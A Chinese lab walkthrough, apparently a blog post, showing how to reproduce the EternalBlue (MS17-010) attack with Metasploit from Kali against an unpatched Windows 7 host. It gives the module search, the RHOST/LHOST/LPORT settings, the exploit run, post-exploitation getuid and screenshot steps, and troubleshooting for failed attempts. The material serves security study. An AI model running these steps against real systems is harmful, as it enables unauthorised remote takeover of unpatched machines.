msf永恒之蓝漏洞复现及问题解决

IP

kali:192.168100.101

Windows7:192.168.100.91

Windows系统需要关闭防火墙,尤其是公用网络设置应该关闭

开始

1,查找永恒之蓝漏洞

search ms17_010

show options:展现需要设置的模块

msf永恒之蓝漏洞复现及问题解决_第1张图片

 

 

使用漏洞

msf永恒之蓝漏洞复现及问题解决_第2张图片

 

注:RHOST:靶机IP地址,即为Windows7的IP地址,set RHOST 192.168.100.91

RPORT:靶机端口号, 默认445端口,不必设置

LHOST:攻击机IP地址,即本机IP set LHOST 192.168.100.101

LPORT:攻击者端口号,随机端口号,(1-65535) set LPORT 4444

payloads使用msf默认提供的即可,无需设置,设置的话,set payload ...

show options:展现需要设置的地方

之后exploit即可,等待靶机返回payload

 

msf永恒之蓝漏洞复现及问题解决_第3张图片

msf永恒之蓝漏洞复现及问题解决_第4张图片

 

屏幕截图和getuid

msf永恒之蓝漏洞复现及问题解决_第5张图片

 

如果攻击无法成功,可以从以下几方面寻找原因

1,Windows7未关闭防火墙

2,rhost和lhost设置错误

3,端口占用

4,Windows7系统更新,已经将漏洞修复

5,target设置为自动,需手动设置target

msf永恒之蓝漏洞复现及问题解决_第6张图片

 

6,最重要的,Windows7网络共享中心设置网络连接方式为 公用网络,可以转换为专用网络或家庭网络即可成功

你可能感兴趣的:(kali,kali,linux,渗透测试)